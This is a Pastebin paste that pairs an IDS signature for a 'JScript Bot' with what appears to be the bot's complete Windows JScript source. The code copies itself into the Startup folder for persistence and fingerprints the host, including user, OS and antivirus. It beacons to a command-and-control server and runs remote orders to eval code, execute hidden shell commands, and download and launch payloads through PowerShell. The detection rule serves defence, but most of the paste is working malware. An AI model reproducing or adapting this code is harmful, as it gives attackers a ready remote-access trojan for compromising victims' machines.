API tools faq
paste
Advertisement
James_inthe_box

Jscript Bot

James_inthe_box
Jan 6th, 2019
858
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.68 KB | None | 0 0
raw download clone embed print report
  1. alert tcp $HOME_NET any -> $EXTERNAL_NET !$HTTP_PORTS (msg:"JScript Bot Initial Checkin"; flow:established,to_server; content:"POST"; http_method; content:"User-Agent|3a| xmsSofts_1.0.0_"; content:"Content-Length|3a 20|0"; http_header; classtype:trojan-activity; sid:20166280; rev:1; metadata:created_at 2019_01_06;)
  2.  
  3. var shell = new ActiveXObject('WScript.Shell');
  4. var fstym = new ActiveXObject('Scripting.FileSystemObject');
  5. var spl = '|V|';
  6. var Ch = '\\';
  7. var VN = 'xmsSofts_1.0.0' + '_' + getSerial();
  8. var Startup = getEnv('appdata') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
  9. var StartupAll = getEnv('allusersprofile') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
  10. var Temp = getEnv('temp') + '\\';
  11. var fxDmE4zu = WScript.ScriptFullName;
  12. var wn = WScript.ScriptName;
  13. var UDex;
  14. var DeLay = 20;
  15. ModinySks();
  16. do {
  17. try {
  18. var send = SendHttp();
  19. var Command = send.split(spl);
  20. var order = Command[0];
  21. var order_data = Command[1];
  22. if (order === 'Ex') {
  23. eval(order_data);
  24. }
  25. if (order === 'Cmd') {
  26. shell.Run(order_data, 0, false);
  27. }
  28. if (order === 'DwnlExe') {
  29. var path = Temp + Command[2];
  30. shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, false);
  31. WScript.Sleep(DeLay * 1000);
  32. shell.Run('powershell.exe start ' + path, 0, false);
  33. }
  34. if (order === 'SelfRemove') {
  35. shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
  36. shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
  37. WScript.Quit(1);
  38. }
  39. if (order === 'UpdateS') {
  40. var path = Temp + Command[2];
  41. shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, true);
  42. if (fstym.fileexists(path)) {
  43. shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
  44. shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
  45. WScript.Sleep(DeLay * 1000);
  46. shell.Run("powershell.exe start '" + path + "'", 0, false);
  47. WScript.Quit(1);
  48. }
  49. }
  50. } catch (err) {
  51. util_log('>>> Silencing catch ' + _inspect(err));
  52. }
  53. WScript.Sleep(5000);
  54. } while (true);
  55. function SendHttp(R) {
  56. var X = new ActiveXObject('Microsoft.XMLHTTP');
  57. X.open('POST', 'http://micro-soft-updates.ga:8880/connect', false);
  58. var useragent = getUserAgent();
  59. X.SetRequestHeader('User-Agent:', useragent);
  60. X.send(R);
  61. return X.responsetext;
  62. }
  63. function getUserAgent() {
  64. var s, NT, i;
  65. if (fstym.fileexists(getEnv('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) {
  66. NT = 'YES';
  67. } else {
  68. NT = 'NO';
  69. }
  70. s = VN + Ch + jsUcfirst(getEnv('COMPUTERNAME')) + Ch + jsUcfirst(getEnv('USERNAME')) + Ch + jsUcfirst(getSystem() + '[' + getOSVer() + ']') + Ch + jsUcfirst(getAntiV()) + Ch + NT + Ch + UDex + Ch;
  71. return s;
  72. }
  73. function getEnv(S) {
  74. return shell.ExpandEnvironmentStrings('%' + S + '%');
  75. }
  76. function getSerial() {
  77. var s;
  78. s = GetObject('winmgmts:').InstancesOf('win32_logicaldisk');
  79. var en = new Enumerator(s);
  80. for (; !en.atEnd(); en.moveNext()) {
  81. var it = en.item();
  82. return it.volumeserialnumber;
  83. break;
  84. }
  85. }
  86. function getSystem() {
  87. var s = GetObject('winmgmts:').InstancesOf('Win32_OperatingSystem');
  88. var en = new Enumerator(s);
  89. for (; !en.atEnd(); en.moveNext()) {
  90. var it = en.item();
  91. return it.Caption;
  92. break;
  93. }
  94. }
  95. function getOSVer() {
  96. return GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth;
  97. }
  98. function getAntiV() {
  99. var s;
  100. var finalx = [];
  101. var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter';
  102. try {
  103. s = GetObject(wmg).InstancesOf('AntiVirusProduct');
  104. var en = new Enumerator(s);
  105. for (; !en.atEnd(); en.moveNext()) {
  106. var it = en.item();
  107. var str = it.DisplayName;
  108. finalx.push(str);
  109. }
  110. } catch (e) {
  111. util_log('>>> Silencing catch ' + _inspect(e));
  112. }
  113. if (str !== '') {
  114. wmg = wmg + '2';
  115. try {
  116. s = GetObject(wmg).InstancesOf('AntiVirusProduct');
  117. en = new Enumerator(s);
  118. for (; !en.atEnd(); en.moveNext()) {
  119. it = en.item();
  120. var str = it.DisplayName;
  121. finalx.push(str);
  122. }
  123. } catch (e) {
  124. util_log('>>> Silencing catch ' + _inspect(e));
  125. }
  126. } else {
  127. }
  128. var finalxsrt = finalx.join(' , ');
  129. return finalxsrt;
  130. }
  131. function ModinySks() {
  132. try {
  133. shell.Run("powershell.exe Copy-Item -Path '" + fxDmE4zu + "' -Destination '" + Startup + wn + "'", 0, false);
  134. } catch (err) {
  135. util_log('>>> Silencing catch ' + _inspect(err));
  136. }
  137. }
  138. function jsUcfirst(string) {
  139. var strx = string.charAt(0).toUpperCase() + string.slice(1);
  140. strx = strx.replace('\\', '');
  141. return strx;
  142. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!